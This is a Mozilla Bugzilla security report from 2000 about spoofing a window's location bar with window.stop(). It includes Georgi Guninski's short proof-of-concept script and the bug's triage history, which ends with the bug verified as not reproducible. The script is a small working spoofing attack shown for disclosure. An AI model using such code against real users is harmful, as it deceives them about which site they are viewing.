Closed Bug 26845 Opened 25 years ago Closed 24 years ago

Spoofing windows using window.stop()

Categories

(Core :: Security, defect, P3)

x86
Windows NT
defect

Tracking

()

VERIFIED WORKSFORME

People

(Reporter: norrisboyd, Assigned: security-bugs)

References

()

Details

Subject: BUG: Spoofing windows using window.stop() Date: Mon, 07 Feb 2000 15:09:50 +0200 From: Georgi Guninski <joro@nat.bg> To: Norris Boyd <norris@netscape.com> Spoofing windows using window.stop() It is possible to spoof windows due to setting the location bar rather early (before the content area is displayed). The code is: -------------------------------------------------------------------- Spoofing windows. Wait 5 seconds. <SCRIPT> a=window.open("http://www.mozilla.org","victim"); setTimeout("b=window.open('http://www.yahoo.com','victim');b.stop();",5000); </SCRIPT>
Group: netscapeconfidential?
Spoofing is post-beta.
Status: NEW → ASSIGNED
Target Milestone: M16
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
Target Milestone: M16 → M17
Bulk reassigning most of norris's bugs to mstoltz.
Assignee: norris → mstoltz
Status: ASSIGNED → NEW
This doesn't seem to be happening now. The second page loads completely along with its correct location bar, on both NT and Linux. Marking WORKSFORME. Cathy, can you verify?
Status: NEW → RESOLVED
Closed: 24 years ago
Resolution: --- → WORKSFORME
Assigning QA to czhang
QA Contact: junruh → czhang
Assigning QA to czhang
I could not reproduce the bug, it also works fine for me.
Status: RESOLVED → VERIFIED
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.